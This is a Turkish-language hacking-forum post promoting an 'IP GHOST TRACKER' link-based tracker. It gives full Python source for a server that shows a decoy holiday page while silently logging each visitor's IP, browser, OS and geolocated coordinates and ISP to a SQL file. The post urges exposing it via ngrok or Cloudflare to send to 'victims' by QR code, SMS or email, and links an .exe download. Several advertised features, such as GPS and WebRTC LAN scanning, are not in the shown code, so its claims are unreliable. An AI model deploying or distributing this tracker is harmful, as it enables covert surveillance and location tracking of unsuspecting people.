🌐 IP GHOST TRACKER v1.0 - Link Tıkla, Konum + Tüm Ağ IP'lerini Sızdır! 💀
SpyHackerz Yeraltı! Yeni silah: IP GHOST TRACKER – Python tabanlı izleme bombası . Tek link paylaş, tıklandığı an konum, tüm ağ IP'leri, cihazın parmak izi cebinde! Sıfır istemci kurulumu , saf HTML/JS + Python sunucusu – pentest/red ekibi için mükemmel keşif aracı .Nasıl İmha Eder? 🔥
Victim tıklar → ANINDA:
✅ GPS/Konum (HTML5 Geolocation)
✅ Public IP + ISP + Country/City
✅ Local Ağ IP'leri (LAN scan via WebRTC)
✅ Tüm Network Devices (router, phones, PCs)
✅ Browser Fingerprint (UA, screen, timezone, fonts)
Python Sunucusu – 1 Dakikada Kurulum 🐍
Python# ghost_tracker.py - Full source dahil
from flask import Flask, request, jsonify
import requests # ip-api.com için
app.route('/track')
def track():
ip = request.remote_addr
user_agent = request.headers.get('User-Agent')
# Geolocation + Network dump
location = requests.get(f'http://ip-api.com/json/{ip}')
# JS payload victim'a inject et
return open('tracker.html').read()
Özellikler :
- Gerçek Zamanlı Kontrol Paneli : Canlı Mağdur
- Gizli Mod : Hiçbir uyarı vermez
- Toplu Dağıtım : QR kod oluşturucu, SMS/e-posta bağlantıları.
- Dışa Aktar : JSON/CSV dosya dökümü.
TAM KAYNAK + BARINDIRILAN DEMOZIP'te. Foruma özel – ilk
exe halindeki Bağlantı : https://dosya.co/xoh3tmnu54jz/log-cekici.exe.html
source kodu : https://dosya.co/cm5djavimgba/log-cekici.py.html
İndirmek istemeyenler için direkt source kodu yazıyorum
import http.server
import socketserver
import threading
import requests
import sys
import ctypes
from datetime import datetime
# ===================== ADMIN KONTROLÜ =====================
def is_admin():
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
def run_as_admin():
if not is_admin():
try:
script = sys.argv[0]
params = ' '.join([script] + sys.argv[1:])
ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, params, None, 1)
sys.exit(0)
except:
print("[!] Admin izni alınamadı.")
sys.exit(1)
run_as_admin()
# ========================================================
visitor_count = 0
seen_ips = {}
DUPLICATE_TIMEOUT = 30
GEO_APIS = [
"http://ip-api.com/json/",
"https://freeipapi.com/api/json/",
"http://ipwho.is/",
]
HOLI_HTML = "<h1 style='color:white;text-align:center;margin-top:20%;'>RANG BARSE 🎉</h1>"
# ===================== SAFE SQL =====================
def safe(val):
return str(val).replace("'", "''") if val is not None else ""
# ================================================
class LoggerHandler(http.server.SimpleHTTPRequestHandler):
# ❌ default log kapat
def log_message(self, format, *args):
return
def get_real_ip(self):
x_forwarded_for = self.headers.get('X-Forwarded-For')
if x_forwarded_for:
return x_forwarded_for.split(',')[0].strip()
return self.client_address[0]
def get_geo_info(self, ip):
# local ip ise boş dön
if ip.startswith(("192.", "127.", "10.")):
return {}
for base_url in GEO_APIS:
try:
r = requests.get(base_url + ip, timeout=5)
if r.status_code == 200:
return r.json()
except:
continue
return {}
def save_to_sql(self, log_data):
global visitor_count
timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
sql = f"""INSERT INTO visitors VALUES (
{visitor_count}, '{timestamp}', '{safe(log_data['ip'])}', '{safe(log_data['user_agent'])}',
'{safe(log_data['os'])}', '{safe(log_data['browser'])}', '{safe(log_data['city'])}',
'{safe(log_data['region'])}', '{safe(log_data['country'])}', '{safe(log_data['country_code'])}',
'{safe(log_data['continent'])}', '{safe(log_data['lat'])}', '{safe(log_data['lon'])}',
'{safe(log_data['zip'])}', '{safe(log_data['timezone'])}', '{safe(log_data['isp'])}',
'{safe(log_data['org'])}', '{safe(log_data['currency'])}',
'{safe(log_data['mobile'])}', '{safe(log_data['proxy'])}', '{safe(log_data['hosting'])}'
);\n"""
with open("kullanici-log.sql", "a", encoding="utf-8") as f:
f.write(sql)
def do_GET(self):
global visitor_count, seen_ips
# site göster
self.send_response(200)
self.send_header("Content-type", "text/html; charset=utf-8")
self.end_headers()
self.wfile.write(HOLI_HTML.encode())
ip = self.get_real_ip()
now = datetime.now().timestamp()
if ip in seen_ips and now - seen_ips[ip] < DUPLICATE_TIMEOUT:
print(f"[!] Tekrar ziyaret: {ip}")
return
seen_ips[ip] = now
visitor_count += 1
user_agent = self.headers.get('User-Agent', 'Bilinmiyor')
geo = self.get_geo_info(ip)
city = geo.get("city")
country = geo.get("country")
region = geo.get("regionName")
lat = geo.get("lat")
lon = geo.get("lon")
isp = geo.get("isp")
org = geo.get("org")
ua = user_agent.lower()
os_name = "Windows" if "windows" in ua else \
"Android" if "android" in ua else \
"iOS" if "iphone" in ua else "Bilinmiyor"
browser = "Chrome" if "chrome" in ua else \
"Firefox" if "firefox" in ua else \
"Edge" if "edg" in ua else "Bilinmiyor"
# 🔥 güzel log
print(f"""
══════════════════════════════
👤 Ziyaretçi #{visitor_count}
🕒 {datetime.now().strftime('%H:%M:%S')}
🌐 IP : {ip}
📱 OS : {os_name}
🌍 Konum : {city}, {region}, {country}
🧠 Tarayıcı: {browser}
🏢 ISP : {isp}
🏛️ Org : {org}
📍 Koord : {lat}, {lon}
══════════════════════════════
""")
log_data = {
'ip': ip,
'user_agent': user_agent,
'os': os_name,
'browser': browser,
'city': city,
'region': region,
'country': country,
'country_code': geo.get("countryCode"),
'continent': geo.get("continent"),
'lat': lat,
'lon': lon,
'zip': geo.get("zip"),
'timezone': geo.get("timezone"),
'isp': isp,
'org': org,
'currency': geo.get("currency"),
'mobile': geo.get("mobile"),
'proxy': geo.get("proxy"),
'hosting': geo.get("hosting")
}
self.save_to_sql(log_data)
def run_server():
with socketserver.TCPServer(("", 8080), LoggerHandler) as httpd:
print("[√] Server başladı: http://localhost:8080")
httpd.serve_forever()
if __name__ == "__main__":
threading.Thread(target=run_server, daemon=True).start()
print("🚀 Sistem aktif...")
input("Çıkmak için Enter...")
VİRÜSTOTAL : https://www.virustotal.com/gui/file...f32309fa7b59d816197d575a2965f67cc43/detection
NGROK LOCALTONET VE CLOUDFLARE İLE DIŞ AĞYA PORT AÇIP HERKEZE ATABİLİRSİNİZ
GELEN LOGLARIDA SQL DOSYASINA YAZACAKTIR
Son düzenleme:
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl